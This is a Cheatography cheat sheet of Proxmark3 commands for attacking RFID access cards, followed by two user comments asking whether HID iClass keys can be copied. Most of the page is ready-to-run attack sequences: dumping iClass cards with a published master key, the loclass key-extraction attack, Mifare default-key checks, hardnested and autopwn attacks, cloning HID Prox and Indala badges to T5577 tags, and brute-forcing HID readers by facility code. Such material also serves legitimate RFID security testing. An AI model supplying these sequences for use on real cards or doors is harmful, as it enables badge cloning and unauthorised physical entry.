Cheatography
https://cheatography.com
iClassReverse Permute Master Key | hf iclass permute r 3F90EBF0910F7B6F
| Simulate Reader | hf iclass reader
| Dump | hf iclass dump k AFA785A7DAB33378
| Read Block | hf iclass readblk b 7 k AFA785A7DAB33378
| Write to Block | hf iclass writeblk b 07 d 6ce099fe7e614fd0 k AFA785A7DAB33378
| Print Keystore | hf iclass managekeys p
| Add Key to Keystore [0-7] | hf iclass managekeys n 0 k AFA785A7DAB33378
| Encrypt Block | hf iclass encryptblk 0000000f2aa3dba8
| Load Dump | hf iclass eload f iclass_tagdump-filename.bin
| Simulate | hf iclass sim 3
|
Simulation notes:
0 <CSN> simulate the given CSN
1 simulate default CSN
3 Full simulation using emulator memory
Simulate iClass Sequence
pm3 > hf iclass dump k AFA785A7DAB33378
pm3 > hf iclass eload f iclass_tagdump-db883702f8ff12e0.bin
pm3 > hf iclass sim 3
Clone iClass Legacy Sequence
pm3 > hf iclass readblk b 7 k AFA785A7DAB33378
pm3 > hf iclass writeblk b 07 d 6ce099fe7e614fd0 k AFA785A7DAB33378
iClass loclass attackExtract custom iClass key (loclass attack)
pm3 > hf iclass sim 2
pm3 > hf iclass loclass f iclass_mac_attack.bin
pm3 > hf iclass dump k <Kcus> e
Verify custom iClass key
pm3 > hf iclass lookup u 010a0ffff7ff12e0 p feffffffffffffff m 66348979153c41b9 f default_iclass_keys.dic e |
| | Generic CommandsHigh Frequency Search | hf search
| Low Frequency Search | lf search
| Measure Antenna Characteristics | hw tune
| Check Version | hw version
| Check overall status | hw status
|
MifareCheck for Default Keys | hf mf chk *1 ? d default_keys.dic
| Dump (0=Mini, 1=1k, 2=2k, 4=4k) | hf mf dump 1
| Write to Block | hf mf wrbl 0 A FFFFFFFFFFFF d3a2859f6b880400c801002000000016
| Hardnested Attack | hf mf hardnested 0 A FFFFFFFFFFFF 0 A w
| Load Dump | hf mf eload 353C2AA6
| Simulate | hf mf sim u 353c2aa6
| Run autopwn | hf mf autopwn
|
Simulate Mifare Sequence
pm3 > hf mf chk *1 ? d default_keys.dic
pm3 > hf mf dump 1
pm3 > script run dumptoemul -i dump.bin
pm3 > hf mf eload 353C2AA6
pm3 > hf mf sim u 353c2aa6
Clone Mifare 1K Sequence
pm3 > hf mf chk *1 ? d default_keys.dic
pm3 > hf mf dump
pm3 > hf mf restore 1 u 4A6CE843 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin
IndalaRead | lf indala read
| Demodulate | lf indala demod
| Simulate | lf indala sim a0000000c2c436c1
| Clone to T55x7 | lf indala clone a0000000c2c436c1
|
Lua ScriptsList Scripts | script list
| Convert .bin to .eml | script run dumptoemul -i filename.bin
| Format Mifare card | script run formatMifare -k FFFFFFFFFFFF -n FFFFFFFFFFFF -x
|
Options
---
k <key> : the current six byte key
n <key> : the new key
a <access> : the new access bytes
x : execute the commands
| | HID ProxRead | lf hid read
| Demodulate | lf hid demod
| Simulate | lf hid sim 200670012d
| Clone to T5577 | lf hid clone 200670012d
| Convert Site & Facility code to Wiegand | lf hid wiegand 0 56 150
|
Brute force HID reader
Options
---
a <format> : 26|33|34|35|37|40|44|84"
f <FC> : 8-bit value, facility code"
c <CN> : (optional) Starting Number, max 65535"
d <delay> : delay in ms. Default 1000ms"
v : verbose logging, show all tries"
---
pm3 > lf hid brute a 26 f 224
pm3 > lf hid brute v a 26 f 21 c 200 d 2000
Raw DataGet samples | data samples <size>
| Save samples | data save <filename>
| Load samples | data load <filename>
|
HitagRead Hitag information | lf hitag info
| Act as Hitag reader | lf hitag 26
| Sniff Hitag traffic | lf hitag sniff
| Simulate | lf hitag sim c378181c_a8f7.ht2
| Write to Block | lf hitag writer 24 499602D2 1 00000000
|
Simulate Hitag2 sequence
pm3 > lf hitag reader 21 56713368
pm3 > lf hitag sim c378181c_a8f7.ht2
T55XXDetect T55XX | lf t55xx detect
| Demodulation Config | lf t55xx config FSK
| Write to Block | lf t55xx wr b 0 d 00081040
| Factory Reset Tag | lf t55xx wipe
|
Modulation Types
<FSK|FSK1|FSK1a|FSK2|FSK2a|ASK|PSK1|PSK2|NRZ|BI|BIa>
EM is ASK
HID Prox is FSK
Indala is PSK
|
Help Us Go Positive!
We offset our carbon usage with Ecologi. Click the link below to help us!
Created By
https://lewys.eu
Metadata
Favourited By
Comments
hi there
i ask about PM3
in china, pm3 sellers said it is not copying HID Iclass key.
but u wrote possible.
so i am confusing.
plz tell me Using PM3, iclass key copying possible?
hi i need information
PM3, it is possible to copy or read /write HID Iclass key code?
sellers said impossible
so i am confused by wrong information.
plz tell me correct information
Add a Comment
Related Cheat Sheets